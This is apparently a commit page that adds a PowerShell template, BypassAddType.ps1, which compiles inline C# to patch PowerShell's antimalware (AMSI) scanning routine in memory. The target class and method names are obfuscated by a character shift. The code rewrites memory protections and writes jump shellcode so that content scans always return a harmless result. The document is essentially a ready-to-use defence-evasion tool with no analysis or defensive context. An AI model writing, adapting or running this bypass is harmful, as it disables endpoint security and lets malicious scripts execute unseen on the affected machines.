Spaces:
Runtime error
Runtime error
Create BypassAddType.ps1
Browse files- templates/BypassAddType.ps1 +93 -0
templates/BypassAddType.ps1
ADDED
|
@@ -0,0 +1,93 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
$code = @"
|
| 2 |
+
using System;
|
| 3 |
+
using System.ComponentModel;
|
| 4 |
+
using System.Management.Automation;
|
| 5 |
+
using System.Reflection;
|
| 6 |
+
using System.Runtime.CompilerServices;
|
| 7 |
+
using System.Runtime.InteropServices;
|
| 8 |
+
using System.Text;
|
| 9 |
+
|
| 10 |
+
namespace Editor {
|
| 11 |
+
public static class Methods {
|
| 12 |
+
public static void Patch() {
|
| 13 |
+
MethodInfo original = typeof(PSObject).Assembly.GetType(Methods.CLASS).GetMethod(Methods.METHOD, BindingFlags.NonPublic | Static);
|
| 14 |
+
MethodInfo replacement = typeof(Methods).GetMethod("Dummy", BindingFlags.NonPublic | BindingFlags.Static);
|
| 15 |
+
Methods.Patch(original, replacement);
|
| 16 |
+
}
|
| 17 |
+
|
| 18 |
+
[MethodImpl(MethodImplOptions.NoOptimization | MethodImplOptions.NoInlining)]
|
| 19 |
+
private static int Dummy(string content, string metadata) {
|
| 20 |
+
return 1;
|
| 21 |
+
}
|
| 22 |
+
|
| 23 |
+
public static void Patch(MethodInfo original, MethodInfo replacement) {
|
| 24 |
+
//JIT compile methods
|
| 25 |
+
RuntimeHelpers.PrepareMethod(original.MethodHandle);
|
| 26 |
+
RuntimeHelpers.PrepareMethod(replacement.MethodHandle);
|
| 27 |
+
|
| 28 |
+
//Get pointers to the functions
|
| 29 |
+
IntPtr originalSite = original.MethodHandle.GetFunctionPointer();
|
| 30 |
+
IntPtr replacementSite = replacement.MethodHandle.GetFunctionPointer();
|
| 31 |
+
|
| 32 |
+
//Generate architecture specific shellcode
|
| 33 |
+
byte[] patch = null;
|
| 34 |
+
if (IntPtr.Size == 8) {
|
| 35 |
+
patch = new byte[] { 0x49, 0xbb, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0xff, 0xe3 };
|
| 36 |
+
byte[] address = BitConverter.GetBytes(replacementSite.ToInt64());
|
| 37 |
+
for (int i = 0; i < address.Length; i++) {
|
| 38 |
+
patch[i + 2] = address[i];
|
| 39 |
+
}
|
| 40 |
+
} else {
|
| 41 |
+
patch = new byte[] { 0x68, 0x0, 0x0, 0x0, 0x0, 0xc3 };
|
| 42 |
+
byte[] address = BitConverter.GetBytes(replacementSite.ToInt32());
|
| 43 |
+
for (int i = 0; i < address.Length; i++) {
|
| 44 |
+
patch[i + 1] = address[i];
|
| 45 |
+
}
|
| 46 |
+
}
|
| 47 |
+
|
| 48 |
+
//Temporarily change permissions to RWE
|
| 49 |
+
uint oldprotect = 0;
|
| 50 |
+
if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, 0x40, out oldprotect)) {
|
| 51 |
+
throw new Win32Exception();
|
| 52 |
+
}
|
| 53 |
+
|
| 54 |
+
//Apply the patch
|
| 55 |
+
IntPtr written = IntPtr.Zero;
|
| 56 |
+
if (!Methods.WriteProcessMemory(GetCurrentProcess(), originalSite, patch, (uint)patch.Length, out written)) {
|
| 57 |
+
throw new Win32Exception();
|
| 58 |
+
}
|
| 59 |
+
|
| 60 |
+
//Restore the original memory protection settings
|
| 61 |
+
if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, oldprotect, out oldprotect)) {
|
| 62 |
+
throw new Win32Exception();
|
| 63 |
+
}
|
| 64 |
+
}
|
| 65 |
+
|
| 66 |
+
private static string Transform(string input) {
|
| 67 |
+
StringBuilder builder = new StringBuilder(input.Length + 1);
|
| 68 |
+
foreach(char c in input) {
|
| 69 |
+
char m = (char)((int)c - 1);
|
| 70 |
+
builder.Append(m);
|
| 71 |
+
}
|
| 72 |
+
return builder.ToString();
|
| 73 |
+
}
|
| 74 |
+
|
| 75 |
+
[DllImport("kernel32.dll", SetLastError = true)]
|
| 76 |
+
private static extern bool FlushInstructionCache(IntPtr hProcess, IntPtr lpBaseAddress, UIntPtr dwSize);
|
| 77 |
+
|
| 78 |
+
[DllImport("kernel32.dll", SetLastError = true)]
|
| 79 |
+
private static extern IntPtr GetCurrentProcess();
|
| 80 |
+
|
| 81 |
+
[DllImport("kernel32.dll", SetLastError = true)]
|
| 82 |
+
private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
| 83 |
+
|
| 84 |
+
[DllImport("kernel32.dll", SetLastError = true)]
|
| 85 |
+
private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
|
| 86 |
+
|
| 87 |
+
private static readonly string CLASS = Methods.Transform("Tztufn/Nbobhfnfou/Bvupnbujpo/BntjVujmt");
|
| 88 |
+
private static readonly string METHOD = Methods.Transform("TdboDpoufou");
|
| 89 |
+
}
|
| 90 |
+
}
|
| 91 |
+
"@
|
| 92 |
+
Add-Type $code
|
| 93 |
+
[Editor.Methods]::Patch()
|